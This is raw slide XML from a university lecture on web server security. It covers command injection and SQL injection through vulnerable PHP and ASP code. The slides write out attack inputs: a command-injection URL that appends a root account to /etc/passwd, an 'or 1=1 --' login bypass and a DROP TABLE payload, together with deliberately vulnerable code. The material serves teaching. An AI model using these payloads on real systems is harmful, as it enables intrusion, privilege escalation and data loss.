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91" r:id="rId3"/>
    <p:sldId id="392" r:id="rId4"/>
    <p:sldId id="3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24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9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65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Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:    allow only digits,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> +, -, *, /  in  $in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Blacklisting (bad):   disallow  “;”  in $in    ---    but attacker can do “ 10 + system(…) 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5A005-811F-4974-8202-6CEA404E24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61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CEFCB-E197-4C11-8A46-851C02279434}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138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03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2B3FC-2135-4E26-9C94-50F8F163901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04" y="4342789"/>
            <a:ext cx="5485794" cy="4115106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4398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1CD40-DA12-4893-857A-2E2D59A4F097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snipet is in VB.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="272181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74A54-A892-4428-971E-34A2DA7C937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04" y="4342789"/>
            <a:ext cx="5485794" cy="4115106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7725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2C292-C2C7-4F31-A1D1-3E1CA5F9F58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04" y="4342789"/>
            <a:ext cx="5485794" cy="4115106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7877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Escaping is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tricky:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  can reintroduce SQL injection vulnerability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5A005-811F-4974-8202-6CEA404E246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190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3E514-1BC3-4CDD-8A10-6C1AF9A233ED}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24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Escapes with \.     ‘ -&gt; \’   .     DB independent  ---  different DB’s have different rules for escaping.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snipet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is in C#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="299633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vulnerability-list/vendor_id-2337/opsqli-1/Wordpres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6: Modules 6.1-6.10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Server Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> CSE 628/628A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Sandeep K. Shukla</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Indian Institute of Technology Kanpur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Code injection using   system()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Example: PHP server-side code for sending email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Attacker can post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95402" y="2105026"/>
            <a:ext cx="7064375" cy="1019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  $email = $_POST[“email”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $subject = $_POST[“subject”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  system(“mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>email –s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>subject &lt;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joinmynetwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt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295402" y="3886200"/>
            <a:ext cx="7064375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  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>yourdomain.com/mail.php?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>email=hacker@hackerhome.net &amp;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     subject=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt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71602" y="5486400"/>
            <a:ext cx="7064375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  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>yourdomain.com/mail.php?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hacker@hackerhome.net&amp;subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     echo “evil::0:0:root:/:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&gt;/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls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128307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queries with PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138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Sample PHP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endParaRPr lang="en-US" dirty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rgbClr val="0099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Problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900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‘recipient’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is malicious string that changes the meaning of the query?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69871" y="990600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(the wrong way)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5919" y="2362202"/>
            <a:ext cx="7064375" cy="16001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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>recipient = $_POST[‘recipient’];  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PersonID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> FROM Person WHERE 	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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                                 Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='$recipient'";  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);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picture: SQL Injection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AAFDFD-6958-4AC8-BA55-D6DABC5613AF}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340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5" y="2667000"/>
            <a:ext cx="1436687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4113" y="4572000"/>
            <a:ext cx="11557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2" y="1905000"/>
            <a:ext cx="2436813" cy="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789613" y="1524000"/>
            <a:ext cx="1434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Victim Server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5805488" y="6000749"/>
            <a:ext cx="1513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Victim SQL DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14345" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="617539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46" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468315" y="4040188"/>
            <a:ext cx="960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Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2780540" y="2085459"/>
            <a:ext cx="20351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post malicious form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14348" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6184902" y="3651252"/>
            <a:ext cx="1801812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49" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7277100" y="3482977"/>
            <a:ext cx="1485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unintended </a:t>
            </a:r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14350" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119440" y="3714749"/>
            <a:ext cx="263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receive valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225677" y="237807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352" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7207252" y="3090864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353" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743202" y="37338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354" name="Freeform 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2152650" y="2773364"/>
            <a:ext cx="4400550" cy="1703387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T1" fmla="*/ 1703387 h 1703387"/>
              <a:gd name="T2" fmla="*/ 3295651 w 4400550"/>
              <a:gd name="T3" fmla="*/ 131762 h 1703387"/>
              <a:gd name="T4" fmla="*/ 0 w 4400550"/>
              <a:gd name="T5" fmla="*/ 912812 h 1703387"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4400550"/>
              <a:gd name="T10" fmla="*/ 0 h 1703387"/>
              <a:gd name="T11" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T12" fmla="*/ 1703387 h 1703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0550" h="1703387">
                <a:moveTo>
                  <a:pt x="4400550" y="1703387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4032250" y="1179512"/>
                  <a:pt x="4029076" y="263524"/>
                  <a:pt x="3295651" y="131762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2562226" y="0"/>
                  <a:pt x="1098550" y="601662"/>
                  <a:pt x="0" y="91281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763EB4-AB53-445B-A24A-77B4A4F03C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CardSystems Attack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CardSystems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credit card payment processing company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SQL injection attack in June 2005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put out of business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263,000 credit cards stolen from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credit card #s stored unencrypted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43 million credit card #s exposed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37345"/>
            <a:ext cx="1397000" cy="1611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43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18" t="24610" r="33941" b="16382"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="457202"/>
            <a:ext cx="8686800" cy="566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1" y="6290846"/>
            <a:ext cx="7428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http://www.cvedetails.com/vulnerability-list/vendor_id-2337/opsqli-1/Wordpress.html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815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D6FF2-307B-45F8-8CB1-4C00E9065EA9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="228600" cy="13716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Example:  buggy login page  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(ASP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130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set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ok = execute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(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"SELECT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* FROM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Users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WHERE user=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'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&amp;  form(“user”) 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&amp;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" ' </a:t>
            </a:r>
            <a:b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   AND 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pwd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='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&amp; form(“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pwd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”) &amp;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“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'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);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0099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if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not ok.EOF   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		login success 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else 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fail;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this exploitable?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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11502" y="1836737"/>
            <a:ext cx="1274763" cy="240665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Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Server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2" y="1836737"/>
            <a:ext cx="1395413" cy="240665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Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)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412039" y="1836737"/>
            <a:ext cx="1274763" cy="240665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/>
              <a:t>DB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833565" y="3016251"/>
            <a:ext cx="1298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1866900" y="4025900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901594" y="1811339"/>
            <a:ext cx="11641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Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password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386263" y="1981200"/>
            <a:ext cx="3025774" cy="15286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1" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'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AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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847977" y="4525965"/>
            <a:ext cx="30527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Normal Query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6263" y="3449818"/>
            <a:ext cx="3025774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386266" y="3808413"/>
            <a:ext cx="3059111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105400" y="3200400"/>
            <a:ext cx="2438400" cy="42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A6432-2AF4-4D50-9537-3B972F0DB613}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130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   user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean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or 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1=1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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(URL encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"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Then scripts does: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ok = execute( SELECT … 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			WHERE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user= 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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean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'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or 1=1  --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 … )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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  causes rest of line to be ignored.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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Now  ok.EOF   is always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>false and login succeeds.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The bad news:    easy login to many sites this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0" y="3996906"/>
            <a:ext cx="4114800" cy="42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07F75-139E-4502-A23C-6822D349B884}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/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worse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130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user =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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>“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′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ;  DROP TABLE  Users  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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill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Then script does:</a:t>
            </a:r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ok = execute( SELECT … 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WHERE user= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty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; DROP TABLE Users  …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  )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/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Deletes user table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Similarly:   attacker can add users,  reset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwds</a:t>
            </a:r>
            <a:r>
